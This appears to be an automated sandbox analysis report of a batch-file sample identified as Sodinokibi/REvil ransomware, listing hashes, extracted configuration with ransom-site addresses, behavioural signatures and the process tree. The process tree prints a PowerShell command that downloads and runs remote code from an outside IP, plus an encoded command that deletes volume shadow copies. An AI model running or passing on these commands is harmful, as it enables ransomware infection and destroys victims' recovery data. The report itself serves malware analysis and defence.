Analysis
-
max time kernel
23s -
max time network
65s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
421a8c43602d912fb7d54f525915eee9.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
421a8c43602d912fb7d54f525915eee9.bat
Resource
win10v200430
General
-
Target
421a8c43602d912fb7d54f525915eee9.bat
-
Size
220B
-
MD5
c786b66ecefc50b20289a9d38575b5a2
-
SHA1
a1851402b42988ea349215149d3ca3b2890eb425
-
SHA256
bf0760cd225ed3fc4df18cf25a62e6f2f45c50f3e4726d258981e81b68e2bd65
-
SHA512
3dc1d42fda27a8b7c9e3c2b32c957f19a619d035ed0609fea3181efac5c037e516b4184659e69fc0821db6fb56f68052f7a23248c05ddac25964357dd6193a77
Malware Config
Extracted
http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9
Extracted
C:\c82t9od-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A8D042B21194D3AC
http://decryptor.cc/A8D042B21194D3AC
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 800 wrote to memory of 1140 800 cmd.exe powershell.exe PID 1140 wrote to memory of 1776 1140 powershell.exe powershell.exe PID 1140 wrote to memory of 1776 1140 powershell.exe powershell.exe PID 1140 wrote to memory of 1776 1140 powershell.exe powershell.exe PID 1140 wrote to memory of 1776 1140 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeBackupPrivilege 1588 vssvc.exe Token: SeRestorePrivilege 1588 vssvc.exe Token: SeAuditPrivilege 1588 vssvc.exe Token: SeTakeOwnershipPrivilege 1140 powershell.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File created \??\c:\program files\c82t9od-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\c82t9od-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\c82t9od-readme.txt powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\c82t9od-readme.txt powershell.exe File created \??\c:\program files (x86)\c82t9od-readme.txt powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1140 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 1776 powershell.exe 1776 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1140 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\421a8c43602d912fb7d54f525915eee9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9');Invoke-GIEGCPPTNOCAU;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1776
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1588